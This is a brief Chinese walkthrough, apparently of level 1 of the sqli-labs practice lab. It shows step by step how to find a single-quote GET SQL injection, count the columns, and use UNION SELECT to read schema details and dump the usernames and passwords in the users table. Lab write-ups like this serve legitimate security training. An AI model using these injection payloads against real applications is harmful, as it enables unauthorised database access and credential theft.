Less-1
2020-05-16
GET_单引号_字符型注入
0x01 判断注入类型
?id=1
?id=1'
?id=1"
'单引号报错
to use near ''1'' LIMIT 0,1' at line 1
'1'' LIMIT 0,1
'1''
输入的单引号写入了查询语句
存在,GET,单引号注入
0x02 获取回显字段数
?id=1'order by 4--+
报错,说明有3列
0x03 获取数据库名
?id=-1'union select 1,database(),user()--+
得到security数据库
0x04 获取表名
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"--+
0x05 获取列名
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"--+
0x06 获取数据
?id=-1'union select 1,2,group_concat(username,password) from users--+
版权声明:本文为observering原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。